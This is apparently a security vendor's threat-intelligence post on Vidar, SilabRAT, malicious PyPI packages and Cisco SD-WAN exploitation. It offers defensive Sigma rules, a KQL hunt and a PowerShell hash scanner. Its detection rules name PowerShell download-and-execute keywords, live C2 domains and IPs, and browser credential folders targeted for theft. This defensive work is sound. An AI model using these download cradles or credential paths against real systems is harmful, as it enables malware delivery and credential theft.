Back to Intelligence

Vidar, SilabRAT & PyPI Supply Chain Attack: Dark Web Credential Theft Surge

SA
Security Arsenal Team
June 14, 2026
6 min read

A wave of coordinated dark web activity has been detected targeting enterprise credentials through diverse vectors. Threat actors, including Storm-3075 and o1oo1, are leveraging AI hype (ChatGPT/DeepSeek) and social media platforms (TikTok) to distribute infostealers like Vidar and Lumma. Simultaneously, a sophisticated supply chain attack is targeting bioinformatics developers via malicious PyPI packages (Hades, Miasma). The objective is consistent: credential harvesting, cryptocurrency wallet theft, and establishing persistent remote access.

Threat Summary

The current threat landscape exhibits a convergence of social engineering and supply chain compromises.

  • Social Engineering & Malvertising: Storm-3075 is actively impersonating AI brands to trick users into downloading loaders like Hijack Loader, which deploys Vidar and Lumma Stealer. Parallel campaigns on TikTok utilize fake software tutorials to distribute PowerShell downloaders for Vidar.
  • Supply Chain Attack: A campaign targeting Python developers employs typosquatting and malicious .abi3.so native extensions within PyPI wheels to execute Hades and Miasma worms upon import.
  • Infrastructure Exploitation: UAT-8616 is exploiting Cisco Catalyst SD-WAN vulnerabilities (CVE-2026-20182) to drop webshells (XenShell, Godzilla) and cryptocurrency miners, facilitating lateral movement and credential dumping.
  • MaaS Operations: The actor o1oo1 is marketing SilabRAT, a $5,000/month Malware-as-a-Service platform featuring HVNC (Hidden Virtual Network Computing) and browser profile cloning specifically designed to bypass MFA and steal active sessions.

Threat Actor / Malware Profile

Malware Families

  • Vidar Stealer: An infostealer targeting browser data, cryptocurrency wallets, and 2FA sessions. Distributed via malvertising and fake tutorials.
  • SilabRAT: A sophisticated RAT sold on dark web forums. Uses HijackLoader for execution and features HVNC for invisible remote control. Capabilities include clipboard hijacking, browser profile cloning, and session hijacking.
  • Hades / Miasma: Worms targeting developers. Use malicious Python startup hooks (.pth) and trojanized native extensions to achieve execution upon library import.

Adversaries

  • Storm-3075: Focuses on broad social engineering campaigns using high-interest topics (AI) to deliver credential theft payloads.
  • UAT-8616: Sophisticated actor targeting network infrastructure (Cisco SD-WAN) to gain administrative access and deploy webshells/miners.
  • o1oo1: Developer of SilabRAT, financially motivated, catering to other criminals looking for stealthy remote access.

Attack Chain

  1. Initial Access: Phishing (AI branding), Malvertising (SEO poisoning), Social Media (TikTok tutorials), or Supply Chain (PyPI download).
  2. Execution: PowerShell commands (TikTok), Malicious DLL loading (Hijack Loader), or Native Python extension execution.
  3. Persistence: Scheduled tasks, Registry run keys, or Browser extension injection.
  4. Credential Access: Dumping browser cookies/passwords (Vidar), clipboard hijacking (SilabRAT), or scraping memory for crypto keys.
  5. C2 / Exfiltration: Data sent to C2 servers (e.g., brokeapt.com) via HTTP/HTTPS or custom protocols (GhostSocks).

IOC Analysis

The provided IOCs include:

  • Domains: brokeapt.com, msget.run, d4ug.site. Used for C2 communication and payload delivery. SOC teams should block these at the firewall and proxy level.
  • File Hashes: SHA256 and MD5 hashes for loaders, droppers, and malware payloads (Vidar, SilabRAT). These should be added to EDR blocklists and used to scan historical file archives.
  • IPs: 91.199.163.124 (SilabRAT C2).
  • CVEs: CVE-2026-20182, CVE-2026-20133 (Cisco SD-WAN).

Operationalization:

  • EDR: Hunt for file hashes on disk and in memory.
  • SIEM: Correlate firewall blocks of the listed domains with endpoint process creation events.
  • Network: Use DNS query logs to identify internal systems attempting to resolve the malicious domains.

Detection Engineering

Sigma Rules

YAML
title: Potential Vidar Stealer Distribution via PowerShell
date: 2026/06/14
description: Detects PowerShell commands often used in fake tutorials to download Vidar stealer payloads from suspicious domains.
references:
  - https://www.infosecurity-magazine.com/news/fake-software-videos-tiktok-vidar/
author: Security Arsenal
status: experimental
tags:
  - attack.execution
  - attack.t1059.001
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
    CommandLine|contains:
      - 'Invoke-WebRequest'
      - 'IEX'
      - 'DownloadString'
  selection_urls:
    CommandLine|contains:
      - 'msget.run'
      - 'd4ug.site'
      - 'brokeapt.com'
  condition: selection and selection_urls
falsepositives:
  - Legitimate administrative scripts
level: high
---
title: Malicious PyPI Package Execution via Native Extension
date: 2026/06/14
description: Detects execution of Python processes loading suspicious .abi3.so or .pyd files often associated with Hades/Miasma supply chain attacks.
references:
  - https://socket.dev/blog/mini-shai-hulud-miasma-and-hades-worms
tags:
  - attack.initial_access
  - attack.t1195.002
logsource:
  category: process_creation
  product: windows
detection:
  selection_python:
    Image|endswith:
      - '\python.exe'
      - '\python3.exe'
  selection_module:
    CommandLine|contains:
      - '.abi3.so'
      - 'importlib'
  condition: selection_python and selection_module
falsepositives:
  - Legitimate bioinformatics tools
level: medium
---
title: SilabRAT or Vidar Browser Credential Access
date: 2026/06/14
description: Detects processes accessing browser user data directories, a behavior common to Vidar and SilabRAT for credential theft.
references:
  - https://www.group-ib.com/blog/silabrat-hijackloader-trojan-malware/
tags:
  - attack.credential_access
  - attack.t1005
logsource:
  category: file_access
  product: windows
detection:
  selection:
    TargetFilename|contains:
      - '\Google\Chrome\User Data\Default\'
      - '\AppData\Local\BraveSoftware\'
      - '\AppData\Roaming\Opera Software\'
  exclusion:
    Image|endswith:
      - '\chrome.exe'
      - '\opera.exe'
      - '\brave.exe'
  condition: selection and not exclusion
falsepositives:
  - Backup software
  - Browser sync utilities
level: high

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for network connections to known malicious domains/IPs
let IOCs = dynamic(["brokeapt.com", "pan.rongtv.xyz", "pan.ssffaa19.xyz", "91.199.163.124", "msget.run", "d4ug.site"]);
DeviceNetworkEvents
| where RemoteUrl in IOCs or RemoteIP in IOCs
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessCommandLine, RemoteUrl, RemoteIP
| order by Timestamp desc

PowerShell Hunt Script

PowerShell
# Hunt for File Hashes associated with Vidar, SilabRAT, and Hades
$MaliciousHashes = @(
    "0a26238f6c516de5885457c93042531aa59bc206a9537cebf5267cedc6c68531",
    "25270cc429ada8028b5b33220ed412c47907ecceea7377d608fac5af01bed56a",
    "5455341ed1bbe75a664fca2dd0794c508e1874f75360253a7ff5bc119bc92d80",
    "56d722b0331bf0aaa86bb37483486c6dff6ad9427fc473ed7c3226c21a9bdd23",
    "d94f75a70b5cabaf786ac57177ed841732e62bdcc9a29e06e5b41d9be567bcfa",
    "3a6adbe0081b2488e0f137496e92591e0c29148154b2d99faadab9cc435b879b",
    "79f8da9f9fb4ac7c16d9c210f1f6ef418357a3e7bf602b1dd03a490596fa58c5",
    "fb56e66920c84ef9e51db0ea23144f5755daef97cbff8633b05ab56d0dc9d623",
    "fbce30a0c852972fdc24f1b6a7c270512a50ef1a7c6c88c88b92a2dcbdfdd023",
    "6506d31707a39949f89534bf9705bcf889f1ecae3dbc6f4ff88d67a8be3d01b2",
    "6d332f814f15f19758d65026bbfd0a8c49671b319ec77b8fa1b27fc48afff7d9"
)

Write-Host "Scanning for malicious file hashes..." -ForegroundColor Yellow

# Search C: Drive for files matching these hashes
Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue | 
ForEach-Object {
    $hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
    if ($hash -in $MaliciousHashes) {
        Write-Host "THREAT DETECTED: $($_.FullName)" -ForegroundColor Red
    }
}

Write-Host "Scan complete."


# Response Priorities

*   **Immediate**:
    *   Block all listed domains and IPs at the perimeter firewall and proxy servers.
    *   Scan all endpoints for the listed file hashes.
    *   Patch Cisco Catalyst SD-WAN controllers for CVE-2026-20182 and CVE-2026-20133 immediately.

*   **24 Hours**:
    *   Initiate credential resets for accounts with suspicious login activity or potential exposure to Vidar/SilabRAT.
    *   Review browser extensions and startup items on endpoints for unauthorized additions.
    *   Hunt for PowerShell execution logs matching the fake tutorial pattern.

*   **1 Week**:
    *   Audit all third-party Python packages and PyPI dependencies (SBOM analysis) for the identified malicious artifacts.
    *   Implement application allowlisting for PowerShell to prevent arbitrary script execution.
    *   Conduct security awareness training focused on "AI Impersonation" and "Social Media Scams".

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-credentialsvidar-stealersilabratai-impersonationsupply-chain-attackcredential-theft

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action